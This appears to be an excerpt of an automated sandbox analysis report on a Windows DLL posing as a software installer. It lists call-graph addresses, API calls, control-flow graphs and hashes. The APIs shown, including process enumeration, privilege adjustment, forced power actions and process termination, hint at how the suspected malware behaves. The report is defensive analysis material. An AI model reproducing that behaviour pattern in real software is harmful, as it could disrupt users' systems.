63147->62990 63148->63147 63151 6ca65884 std::_Facet_Register 63148->63151 63254 6ca6de34 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63148->63254 63150 6ca666e3 std::_Facet_Register 63258 6ca68199 RaiseException 63150->63258 63151->63150 63255 6ca68199 RaiseException 63151->63255 63153 6ca66edc IsProcessorFeaturePresent 63159 6ca66f01 63153->63159 63155 6ca666a3 63256 6ca68199 RaiseException 63155->63256 63157 6ca666c3 std::invalid_argument::invalid_argument 63257 6ca68199 RaiseException 63157->63257 63159->62990 63161 6ca598c4 63160->63161 63162 6ca598c6 FindFirstFileA 63160->63162 63161->63162 63163 6ca59900 63162->63163 63163->62996 63165 6ca63f66 63164->63165 63166 6ca63ffb OpenServiceA 63165->63166 63167 6ca64042 63165->63167 63166->63165 63167->63010 63174 6ca4f003 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63168->63174 63169 6ca51bac CloseHandle 63169->63174 63170 6ca51a40 CloseHandle 63170->63174 63171 6c8f37cb 63176 6ca64b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63171->63176 63173 6ca510d2 CloseHandle 63173->63174 63174->63169 63174->63170 63174->63171 63174->63173 63175 6ca3c310 ReadFile WriteFile WriteFile WriteFile 63174->63175 63259 6ca3b750 63174->63259 63175->63174 63176->63008 63178 6c906bd5 63177->63178 63270 6c932020 63178->63270 63180 6c906c68 63181 6ca65863 std::_Facet_Register 4 API calls 63180->63181 63182 6c906ca0 63181->63182 63287 6ca66147 63182->63287 63184 6c906cb4 63299 6c931d90 63184->63299 63187 6c906d8e 63187->63052 63189 6c906dc8 63307 6c9326e0 24 API calls 4 library calls 63189->63307 63191 6c906dda 63308 6ca68199 RaiseException 63191->63308 63193 6c906def 63309 6c92e010 67 API calls 63193->63309 63195 6c906e0f 63195->63052 63197 6c906e9f 63196->63197 63200 6c906eb3 63197->63200 63672 6c933560 32 API calls std::_Xinvalid_argument 63197->63672 63202 6c906f5b 63200->63202 63674 6c932250 30 API calls 63200->63674 63675 6c9326e0 24 API calls 4 library calls 63200->63675 63676 6ca68199 RaiseException 63200->63676 63203 6c906f6e 63202->63203 63673 6c9337e0 32 API calls std::_Xinvalid_argument 63202->63673 63203->63052 63207 6c90709e 63206->63207 63213 6c9070d1 63206->63213 63677 6c9301f0 63207->63677 63209 6c907183 63209->63010 63211 6ca6f938 67 API calls 63211->63213 63213->63209 63681 6c932250 30 API calls 63213->63681 63214 6c9071ae 63682 6c932340 24 API calls 63214->63682 63216 6c9071be 63683 6ca68199 RaiseException 63216->63683 63218 6c9071c9 63219->63010 63220->63035 63222 6ca63e90 63221->63222 63223 6ca63ed0 WaitForSingleObject CloseHandle CloseHandle 63222->63223 63224 6ca63ec4 63222->63224 63223->63222 63224->63044 63225->63061 63227 6ca647d7 63226->63227 63729 6ca64e10 63227->63729 63229 6ca647e8 63230 6c906ba0 104 API calls 63229->63230 63237 6ca6480c 63230->63237 63231 6ca64887 63781 6c92e010 67 API calls 63231->63781 63233 6ca648bf std::ios_base::_Ios_base_dtor 63782 6c92e010 67 API calls 63233->63782 63236 6ca64874 63766 6ca649b0 63236->63766 63237->63231 63237->63236 63748 6ca65160 63237->63748 63756 6c942590 63237->63756 63238 6ca64902 std::ios_base::_Ios_base_dtor 63238->63097 63241 6ca6487c 63242 6c907090 77 API calls 63241->63242 63242->63231 63243->63086 63246 6ca64087 std::locale::_Setgloballocale 63244->63246 63245 6ca64195 Process32NextW 63245->63246 63246->63245 63247 6ca641c7 63246->63247 63248 6ca640e4 CloseHandle 63246->63248 63249 6ca64160 Process32FirstW 63246->63249 63247->63022 63248->63246 63249->63246 63250->63033 63251->63052 63253->63015 63254->63148 63255->63155 63256->63157 63257->63150 63258->63153 63260 6ca3b763 _Yarn __wsopen_s std::locale::_Setgloballocale 63259->63260 63261 6ca3c2b0 63260->63261 63263 6ca3b900 CreateFileA 63260->63263 63264 6ca3a500 63260->63264 63261->63174 63263->63260 63265 6ca3a513 __wsopen_s std::locale::_Setgloballocale 63264->63265 63266 6ca3b0ef WriteFile 63265->63266 63267 6ca3b735 63265->63267 63268 6ca3a7f2 WriteFile 63265->63268 63269 6ca3ab96 ReadFile 63265->63269 63266->63265 63267->63260 63268->63265 63269->63265 63271 6ca65863 std::_Facet_Register 4 API calls 63270->63271 63272 6c93207e 63271->63272 63273 6ca66147 43 API calls 63272->63273 63274 6c932092 63273->63274 63310 6c932f60 42 API calls 4 library calls 63274->63310 63276 6c9320c8 63277 6c93210d 63276->63277 63278 6c932136 63276->63278 63279 6c932120 63277->63279 63311 6ca65dae 9 API calls 2 library calls 63277->63311 63312 6c932250 30 API calls 63278->63312 63279->63180 63282 6c93215b 63313 6c932340 24 API calls 63282->63313 63284 6c932171 63314 6ca68199 RaiseException 63284->63314 63286 6c93217c 63286->63180 63288 6ca66153 __EH_prolog3 63287->63288 63315 6ca65cd5 63288->63315 63293 6ca66171 63329 6ca661da 39 API calls std::locale::_Setgloballocale 63293->63329 63294 6ca661cc 63294->63184 63296 6ca66179 63330 6ca65fd1 HeapFree GetLastError _Yarn 63296->63330 63298 6ca6618f 63321 6ca65d06 63298->63321 63300 6c906d5d 63299->63300 63301 6c931ddc 63299->63301 63300->63187 63306 6c932250 30 API calls 63300->63306 63335 6ca66267 63301->63335 63305 6c931e82 63306->63189 63307->63191 63308->63193 63309->63195 63310->63276 63311->63279 63312->63282 63313->63284 63314->63286 63316 6ca65ce4 63315->63316 63317 6ca65ceb 63315->63317 63331 6ca6f1ed 6 API calls std::_Lockit::_Lockit 63316->63331 63320 6ca65ce9 63317->63320 63332 6ca673ab EnterCriticalSection 63317->63332 63320->63298 63328 6ca66050 6 API calls 2 library calls 63320->63328 63322 6ca65d10 63321->63322 63323 6ca6f1fb 63321->63323 63327 6ca65d23 63322->63327 63333 6ca673b9 LeaveCriticalSection 63322->63333 63334 6ca6f1d6 LeaveCriticalSection 63323->63334 63326 6ca6f202 63326->63294 63327->63294 63328->63293 63329->63296 63330->63298 63331->63320 63332->63320 63333->63327 63334->63326 63337 6ca66270 63335->63337 63336 6c931dea 63336->63300 63343 6ca6b383 18 API calls __Getctype 63336->63343 63337->63336 63344 6ca6eb6a 63337->63344 63339 6ca662bc 63339->63336 63355 6ca6e878 65 API calls 63339->63355 63341 6ca662d7 63341->63336 63356 6ca6f938 63341->63356 63343->63305 63345 6ca6eb75 __wsopen_s 63344->63345 63346 6ca6eb88 63345->63346 63347 6ca6eba8 63345->63347 63381 6ca6ef40 18 API calls __Getctype 63346->63381 63351 6ca6eb98 63347->63351 63367 6ca79c2c 63347->63367 63351->63339 63355->63341 63357 6ca6f944 __wsopen_s 63356->63357 63358 6ca6f963 63357->63358 63359 6ca6f94e 63357->63359 63365 6ca6f95e 63358->63365 63562 6ca6b3c9 EnterCriticalSection 63358->63562 63577 6ca6ef40 18 API calls __Getctype 63359->63577 63361 6ca6f980 63563 6ca6f9bc 63361->63563 63364 6ca6f98b 63578 6ca6f9b2 LeaveCriticalSection 63364->63578 63365->63336 63368 6ca79c38 __wsopen_s 63367->63368 63383 6ca6f1bf EnterCriticalSection 63368->63383 63370 6ca79c46 63384 6ca79cd0 63370->63384 63375 6ca79d92 63376 6ca79eb1 63375->63376 63408 6ca79f34 63376->63408 63379 6ca6ebec 63382 6ca6ec15 LeaveCriticalSection 63379->63382 63381->63351 63382->63351 63383->63370 63390 6ca79cf3 63384->63390 63385 6ca79c53 63398 6ca79c8c 63385->63398 63386 6ca79d4b 63403 6ca76005 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 63386->63403 63388 6ca79d54 63404 6ca735db HeapFree GetLastError _free 63388->63404 63390->63385 63390->63386 63401 6ca6b3c9 EnterCriticalSection 63390->63401 63402 6ca6b3dd LeaveCriticalSection 63390->63402 63392 6ca79d5d 63392->63385 63405 6ca75a3f 6 API calls std::_Lockit::_Lockit 63392->63405 63394 6ca79d7c 63406 6ca6b3c9 EnterCriticalSection 63394->63406 63397 6ca79d8f 63397->63385 63407 6ca6f1d6 LeaveCriticalSection 63398->63407 63400 6ca6ebc3 63400->63351 63400->63375 63401->63390 63402->63390 63403->63388 63404->63392 63405->63394 63406->63397 63407->63400 63409 6ca79f53 63408->63409 63410 6ca79f66 63409->63410 63414 6ca79f7b 63409->63414 63424 6ca6ef40 18 API calls __Getctype 63410->63424 63412 6ca79ec7 63412->63379 63421 6ca82dfe 63412->63421 63419 6ca7a09b 63414->63419 63425 6ca82cc8 37 API calls __Getctype 63414->63425 63416 6ca7a0eb 63416->63419 63426 6ca82cc8 37 API calls __Getctype 63416->63426 63418 6ca7a109 63418->63419 63427 6ca82cc8 37 API calls __Getctype 63418->63427 63419->63412 63428 6ca6ef40 18 API calls __Getctype 63419->63428 63429 6ca831b6 63421->63429 63424->63412 63425->63416 63426->63418 63427->63419 63428->63412 63431 6ca831c2 __wsopen_s 63429->63431 63430 6ca831c9 63447 6ca6ef40 18 API calls __Getctype 63430->63447 63431->63430 63432 6ca831f4 63431->63432 63438 6ca82e1e 63432->63438 63437 6ca82e19 63437->63379 63449 6ca6f4eb 63438->63449 63443 6ca82e54 63445 6ca82e86 63443->63445 63489 6ca735db HeapFree GetLastError _free 63443->63489 63448 6ca8324b LeaveCriticalSection __wsopen_s 63445->63448 63447->63437 63448->63437 63490 6ca6ab0b 63449->63490 63452 6ca6f50f 63454 6ca6ac16 63452->63454 63499 6ca6ac6e 63454->63499 63456 6ca6ac2e 63456->63443 63457 6ca82e8c 63456->63457 63514 6ca8330c 63457->63514 63463 6ca82fb2 GetFileType 63466 6ca82fbd GetLastError 63463->63466 63467 6ca83004 63463->63467 63464 6ca82ebe __dosmaperr 63464->63443 63465 6ca82f87 GetLastError 63465->63464 63543 6ca6e812 __dosmaperr _free 63466->63543 63544 6ca805d0 SetStdHandle __dosmaperr __wsopen_s 63467->63544 63468 6ca82f35 63468->63463 63468->63465 63542 6ca83277 CreateFileW 63468->63542 63470 6ca82fcb CloseHandle 63470->63464 63486 6ca82ff4 63470->63486 63473 6ca82f7a 63473->63463 63473->63465 63474 6ca83025 63475 6ca83071 63474->63475 63545 6ca83486 70 API calls 2 library calls 63474->63545 63479 6ca83078 63475->63479 63559 6ca83530 70 API calls 2 library calls 63475->63559 63478 6ca830a6 63478->63479 63480 6ca830b4 63478->63480 63546 6ca7a745 63479->63546 63480->63464 63482 6ca83130 CloseHandle 63480->63482 63560 6ca83277 CreateFileW 63482->63560 63484 6ca8315b 63485 6ca83165 GetLastError 63484->63485 63484->63486 63487 6ca83171 __dosmaperr 63485->63487 63486->63464 63561 6ca8053f SetStdHandle __dosmaperr __wsopen_s 63487->63561 63489->63445 63491 6ca6ab22 63490->63491 63492 6ca6ab2b 63490->63492 63491->63452 63498 6ca757f5 5 API calls std::_Lockit::_Lockit 63491->63498 63492->63491 63493 6ca737d2 __Getctype 37 API calls 63492->63493 63494 6ca6ab4b 63493->63494 63495 6ca73d48 __Getctype 37 API calls 63494->63495 63496 6ca6ab61 63495->63496 63497 6ca73d75 __fassign 37 API calls 63496->63497 63497->63491 63498->63452 63500 6ca6ac96 63499->63500 63501 6ca6ac7c 63499->63501 63502 6ca6acbc 63500->63502 63503 6ca6ac9d 63500->63503 63504 6ca6abfc __wsopen_s HeapFree GetLastError 63501->63504 63505 6ca73663 __fassign MultiByteToWideChar 63502->63505 63506 6ca6abbd __wsopen_s HeapFree GetLastError 63503->63506 63507 6ca6ac86 __dosmaperr 63503->63507 63504->63507 63509 6ca6accb 63505->63509 63506->63507 63507->63456 63508 6ca6acd2 GetLastError 63508->63507 63509->63508 63510 6ca6acf8 63509->63510 63511 6ca6abbd __wsopen_s HeapFree GetLastError 63509->63511 63510->63507 63512 6ca73663 __fassign MultiByteToWideChar 63510->63512 63511->63510 63513 6ca6ad0f 63512->63513 63513->63507 63513->63508 63515 6ca83347 63514->63515 63517 6ca8332d 63514->63517 63516 6ca8329c __wsopen_s 18 API calls 63515->63516 63521 6ca8337f 63516->63521 63517->63515 63518 6ca6ef40 __Getctype 18 API calls 63517->63518 63518->63515 63519 6ca833ae 63520 6ca84731 __wsopen_s 18 API calls 63519->63520 63526 6ca82ea9 63519->63526 63522 6ca833fc 63520->63522 63521->63519 63524 6ca6ef40 __Getctype 18 API calls 63521->63524 63523 6ca83479 63522->63523 63522->63526 63525 6ca6ef6d __Getctype 11 API calls 63523->63525 63524->63519 63527 6ca83485 63525->63527 63526->63464 63528 6ca8042c 63526->63528 63529 6ca80438 __wsopen_s 63528->63529 63530 6ca6f1bf std::_Lockit::_Lockit EnterCriticalSection 63529->63530 63531 6ca8043f 63530->63531 63533 6ca80464 63531->63533 63537 6ca804d3 EnterCriticalSection 63531->63537 63539 6ca80486 63531->63539 63532 6ca80536 __wsopen_s LeaveCriticalSection 63534 6ca804a6 63532->63534 63535 6ca80662 __wsopen_s 11 API calls 63533->63535 63534->63464 63541 6ca83277 CreateFileW 63534->63541 63536 6ca80469 63535->63536 63536->63539 63540 6ca807b0 __wsopen_s EnterCriticalSection 63536->63540 63538 6ca804e0 LeaveCriticalSection 63537->63538 63537->63539 63538->63531 63539->63532 63540->63539 63541->63468 63542->63473 63543->63470 63544->63474 63545->63475 63547 6ca803c2 __wsopen_s 18 API calls 63546->63547 63549 6ca7a755 63547->63549 63548 6ca7a75b 63551 6ca8053f __wsopen_s SetStdHandle 63548->63551 63549->63548 63550 6ca7a78d 63549->63550 63552 6ca803c2 __wsopen_s 18 API calls 63549->63552 63550->63548 63553 6ca803c2 __wsopen_s 18 API calls 63550->63553 63558 6ca7a7b3 __dosmaperr 63551->63558 63554 6ca7a784 63552->63554 63555 6ca7a799 CloseHandle 63553->63555 63556 6ca803c2 __wsopen_s 18 API calls 63554->63556 63555->63548 63557 6ca7a7a5 GetLastError 63555->63557 63556->63550 63557->63548 63558->63464 63559->63478 63560->63484 63561->63486 63562->63361 63564 6ca6f9de 63563->63564 63565 6ca6f9c9 63563->63565 63569 6ca6f9d9 63564->63569 63579 6ca6fad9 63564->63579 63601 6ca6ef40 18 API calls __Getctype 63565->63601 63569->63364 63573 6ca6fa01 63594 6ca7a6b8 63573->63594 63575 6ca6fa07 63575->63569 63602 6ca735db HeapFree GetLastError _free 63575->63602 63577->63365 63578->63365 63580 6ca6faf1 63579->63580 63584 6ca6f9f3 63579->63584 63581 6ca78a80 18 API calls 63580->63581 63580->63584 63582 6ca6fb0f 63581->63582 63603 6ca7a98c 63582->63603 63585 6ca7755e 63584->63585 63586 6ca77575 63585->63586 63587 6ca6f9fb 63585->63587 63586->63587 63659 6ca735db HeapFree GetLastError _free 63586->63659 63589 6ca78a80 63587->63589 63590 6ca78aa1 63589->63590 63591 6ca78a8c 63589->63591 63590->63573 63660 6ca6ef40 18 API calls __Getctype 63591->63660 63593 6ca78a9c 63593->63573 63595 6ca7a6de 63594->63595 63599 6ca7a6c9 __dosmaperr 63594->63599 63596 6ca7a705 63595->63596 63598 6ca7a727 __dosmaperr 63595->63598 63661 6ca7a7e1 63596->63661 63669 6ca6ef40 18 API calls __Getctype 63598->63669 63599->63575 63601->63569 63602->63569 63604 6ca7a998 __wsopen_s 63603->63604 63605 6ca7a9a0 __dosmaperr 63604->63605 63606 6ca7a9ea 63604->63606 63607 6ca7aa53 __dosmaperr 63604->63607 63605->63584 63614 6ca807b0 EnterCriticalSection 63606->63614 63644 6ca6ef40 18 API calls __Getctype 63607->63644 63609 6ca7a9f0 63612 6ca7aa0c __dosmaperr 63609->63612 63615 6ca7aa7e 63609->63615 63643 6ca7aa4b LeaveCriticalSection __wsopen_s 63612->63643 63614->63609 63616 6ca7aaa0 63615->63616 63642 6ca7aabc __dosmaperr 63615->63642 63617 6ca7aaf4 63616->63617 63618 6ca7aaa4 __dosmaperr 63616->63618 63619 6ca7ab07 63617->63619 63653 6ca79a89 20 API calls __wsopen_s 63617->63653 63652 6ca6ef40 18 API calls __Getctype 63618->63652 63645 6ca7ac60 63619->63645 63624 6ca7ab1d 63628 6ca7ab46 63624->63628 63629 6ca7ab21 63624->63629 63625 6ca7ab5c 63626 6ca7abb5 WriteFile 63625->63626 63627 6ca7ab70 63625->63627 63630 6ca7abd9 GetLastError 63626->63630 63626->63642 63632 6ca7aba5 63627->63632 63633 6ca7ab7b 63627->63633 63655 6ca7acd1 43 API calls 5 library calls 63628->63655 63629->63642 63654 6ca7b07b 6 API calls __wsopen_s 63629->63654 63630->63642 63658 6ca7b0e3 7 API calls 2 library calls 63632->63658 63636 6ca7ab95 63633->63636 63637 6ca7ab80 63633->63637 63657 6ca7b2a7 8 API calls 3 library calls 63636->63657 63639 6ca7ab85 63637->63639 63637->63642 63638 6ca7ab93 63638->63642 63656 6ca7b1be 7 API calls 2 library calls 63639->63656 63642->63612 63643->63605 63644->63605 63646 6ca80805 __wsopen_s 18 API calls 63645->63646 63647 6ca7ac71 63646->63647 63648 6ca737d2 __Getctype 37 API calls 63647->63648 63651 6ca7ab18 63647->63651 63649 6ca7ac94 63648->63649 63650 6ca7acae GetConsoleMode 63649->63650 63649->63651 63650->63651 63651->63624 63651->63625 63652->63642 63653->63619 63654->63642 63655->63642 63656->63638 63657->63638 63658->63638 63659->63587 63660->63593 63662 6ca7a7ed __wsopen_s 63661->63662 63670 6ca807b0 EnterCriticalSection 63662->63670 63664 6ca7a7fb 63665 6ca7a745 __wsopen_s 21 API calls 63664->63665 63666 6ca7a828 63664->63666 63665->63666 63671 6ca7a861 LeaveCriticalSection __wsopen_s 63666->63671 63668 6ca7a84a 63668->63599 63669->63599 63670->63664 63671->63668 63672->63200 63673->63203 63674->63200 63675->63200 63676->63200 63678 6c93022e 63677->63678 63679 6c9070c4 63678->63679 63684 6ca705fb 63678->63684 63679->63211 63681->63214 63682->63216 63683->63218 63685 6ca70626 63684->63685 63686 6ca70609 63684->63686 63685->63678 63686->63685 63687 6ca70616 63686->63687 63688 6ca7062a 63686->63688 63700 6ca6ef40 18 API calls __Getctype 63687->63700 63692 6ca70822 63688->63692 63693 6ca7082e __wsopen_s 63692->63693 63701 6ca6b3c9 EnterCriticalSection 63693->63701 63695 6ca7083c 63702 6ca707df 63695->63702 63699 6ca7065c 63699->63678 63700->63685 63701->63695 63710 6ca773c6 63702->63710 63708 6ca70819 63709 6ca70871 LeaveCriticalSection 63708->63709 63709->63699 63711 6ca78a80 18 API calls 63710->63711 63712 6ca773d7 63711->63712 63713 6ca80805 __wsopen_s 18 API calls 63712->63713 63715 6ca773dd __wsopen_s 63713->63715 63714 6ca707f3 63717 6ca7065e 63714->63717 63715->63714 63727 6ca735db HeapFree GetLastError _free 63715->63727 63719 6ca70670 63717->63719 63721 6ca7068e 63717->63721 63718 6ca7067e 63728 6ca6ef40 18 API calls __Getctype 63718->63728 63719->63718 63719->63721 63724 6ca706a6 _Yarn 63719->63724 63726 6ca77479 62 API calls 63721->63726 63722 6ca6fad9 62 API calls 63722->63724 63723 6ca78a80 18 API calls 63723->63724 63724->63721 63724->63722 63724->63723 63725 6ca7a98c __wsopen_s 62 API calls 63724->63725 63725->63724 63726->63708 63727->63714 63728->63721 63730 6ca64e45 63729->63730 63731 6c932020 52 API calls 63730->63731 63732 6ca64ee6 63731->63732 63733 6ca65863 std::_Facet_Register 4 API calls 63732->63733 63734 6ca64f1e 63733->63734 63735 6ca66147 43 API calls 63734->63735 63736 6ca64f32 63735->63736 63737 6c931d90 89 API calls 63736->63737 63739 6ca64fdb 63737->63739 63738 6ca6500c 63738->63229 63739->63738 63783 6c932250 30 API calls 63739->63783 63741 6ca65046 63784 6c9326e0 24 API calls 4 library calls 63741->63784 63743 6ca65058 63785 6ca68199 RaiseException 63743->63785 63745 6ca6506d 63786 6c92e010 67 API calls 63745->63786 63747 6ca6507f 63747->63229 63749 6ca651ad 63748->63749 63787 6ca653c0 63749->63787 63751 6ca6529c 63751->63237 63754 6ca651c5 63754->63751 63805 6c932250 30 API calls 63754->63805 63806 6c9326e0 24 API calls 4 library calls 63754->63806 63807 6ca68199 RaiseException 63754->63807 63757 6c9425cf 63756->63757 63760 6c9425e3 63757->63760 63816 6c933560 32 API calls std::_Xinvalid_argument 63757->63816 63763 6c94269e 63760->63763 63818 6c932250 30 API calls 63760->63818 63819 6c9326e0 24 API calls 4 library calls 63760->63819 63820 6ca68199 RaiseException 63760->63820 63762 6c9426b1 63762->63237 63763->63762 63817 6c9337e0 32 API calls std::_Xinvalid_argument 63763->63817 63767 6ca649be 63766->63767 63771 6ca649f1 63766->63771 63769 6c9301f0 64 API calls 63767->63769 63768 6ca64aa3 63768->63241 63770 6ca649e4 63769->63770 63772 6ca6f938 67 API calls 63770->63772 63771->63768 63821 6c932250 30 API calls 63771->63821 63772->63771 63774 6ca64ace 63822 6c932340 24 API calls 63774->63822 63776 6ca64ade 63823 6ca68199 RaiseException 63776->63823 63778 6ca64ae9 63824 6c92e010 67 API calls 63778->63824 63780 6ca64b42 std::ios_base::_Ios_base_dtor 63780->63241 63781->63233 63782->63238 63783->63741 63784->63743 63785->63745 63786->63747 63788 6ca653fc 63787->63788 63789 6ca65428 63787->63789 63804 6ca65421 63788->63804 63810 6c932250 30 API calls 63788->63810 63794 6ca65439 63789->63794 63808 6c933560 32 API calls std::_Xinvalid_argument 63789->63808 63792 6ca65608 63811 6c932340 24 API calls 63792->63811 63794->63804 63809 6c932f60 42 API calls 4 library calls 63794->63809 63795 6ca65617 63812 6ca68199 RaiseException 63795->63812 63799 6ca65647 63814 6c932340 24 API calls 63799->63814 63801 6ca65473 63801->63804 63813 6c932250 30 API calls 63801->63813 63802 6ca6565d 63815 6ca68199 RaiseException 63802->63815 63804->63754 63805->63754 63806->63754 63807->63754 63808->63794 63809->63801 63810->63792 63811->63795 63812->63801 63813->63799 63814->63802 63815->63804 63816->63760 63817->63762 63818->63760 63819->63760 63820->63760 63821->63774 63822->63776 63823->63778 63824->63780 63825 6c8ff150 63827 6c8fefbe 63825->63827 63826 6c8ff243 CreateFileA 63829 6c8ff2a7 63826->63829 63827->63826 63828 6c9002ca 63829->63828 63830 6c9002ac GetCurrentProcess TerminateProcess 63829->63830 63830->63828
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: _strlen
                        • String ID: HR^
                        • API String ID: 4218353326-1341859651
                        • Opcode ID: 70235d594594ad73a298df254d054b83657d0534635ae4bf59e45aaa3e246436
                        • Instruction ID: 9631912a7c2908255d85ebba82792f481df324d91b0c196c6c59e76f2684babb
                        • Opcode Fuzzy Hash: 70235d594594ad73a298df254d054b83657d0534635ae4bf59e45aaa3e246436
                        • Instruction Fuzzy Hash: 96740671644B068FC738CF28C9D0695B7F2EFD6318B198E2DC0A68BA55E774B54ACB40

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4725 6ca598b0-6ca598c2 4726 6ca598c4 4725->4726 4727 6ca598c6-6ca598f3 FindFirstFileA 4725->4727 4726->4727 4728 6ca5991c-6ca59925 4727->4728 4729 6ca59927-6ca5992c 4728->4729 4730 6ca59940-6ca59945 4728->4730 4731 6ca59900-6ca5991a 4729->4731 4732 6ca5992e-6ca59933 4729->4732 4733 6ca59947 4730->4733 4734 6ca59959-6ca5995e 4730->4734 4731->4728 4732->4728 4735 6ca59935-6ca59939 4732->4735 4736 6ca59949-6ca59957 4733->4736 4734->4728 4737 6ca59960-6ca5996c 4734->4737 4735->4736 4736->4728
                        APIs
                        • FindFirstFileA.KERNEL32(?,?), ref: 6CA598CC
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: FileFindFirst
                        • String ID: gF:E$hF:E$hF:E
                        • API String ID: 1974802433-4234190611
                        • Opcode ID: eefd53944415965fd5d8d981af6f0f530b51d98e863c2344586976a2f6fc6600
                        • Instruction ID: 0d4d1b0d069643cdccc38b8ede7ba3c39d4156c0331d9d61da76103883c64915
                        • Opcode Fuzzy Hash: eefd53944415965fd5d8d981af6f0f530b51d98e863c2344586976a2f6fc6600
                        • Instruction Fuzzy Hash: D9116DF4109341DFD7148E78D544A4ABBF0BB85314F988E49F4A8CB6A1E330CD99CB42

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4775 6ca64050-6ca64085 CreateToolhelp32Snapshot 4776 6ca640c0-6ca640c9 4775->4776 4777 6ca64110-6ca64115 4776->4777 4778 6ca640cb-6ca640d0 4776->4778 4781 6ca64087-6ca640b1 call 6ca71a25 4777->4781 4782 6ca6411b-6ca64120 4777->4782 4779 6ca640d2-6ca640d7 4778->4779 4780 6ca64148-6ca6414d 4778->4780 4783 6ca6417f-6ca64190 4779->4783 4784 6ca640dd-6ca640e2 4779->4784 4787 6ca6414f-6ca6417d call 6ca6a740 Process32FirstW 4780->4787 4788 6ca641bc-6ca641c1 4780->4788 4781->4776 4785 6ca64195-6ca641a2 Process32NextW 4782->4785 4786 6ca64122-6ca64127 4782->4786 4783->4776 4784->4776 4791 6ca640e4-6ca640ff CloseHandle 4784->4791 4794 6ca641a7-6ca641b7 4785->4794 4786->4776 4792 6ca64129-6ca64143 4786->4792 4787->4794 4788->4776 4790 6ca641c7-6ca641d5 4788->4790 4791->4776 4792->4776 4794->4776
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CA6405E
                        • CloseHandle.KERNEL32(?), ref: 6CA640EC
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CloseCreateHandleSnapshotToolhelp32
                        • String ID:
                        • API String ID: 3280610774-0
                        • Opcode ID: 507a10b6b662569f4b45c3cd85dc4a2ffb66d93c980c4aec3d4959fe09e2e86a
                        • Instruction ID: bbf8ceaeaac2cdb1132775d9adaa2e6f4392f8089042329c8717a8198a807ea2
                        • Opcode Fuzzy Hash: 507a10b6b662569f4b45c3cd85dc4a2ffb66d93c980c4aec3d4959fe09e2e86a
                        • Instruction Fuzzy Hash: D0315EB464C3009FD710DF66C89475ABBE4EB8A314F144A19F598C3BA0D339D884DB43

                        Control-flow Graph

                        • Executed
                        • Not Executed
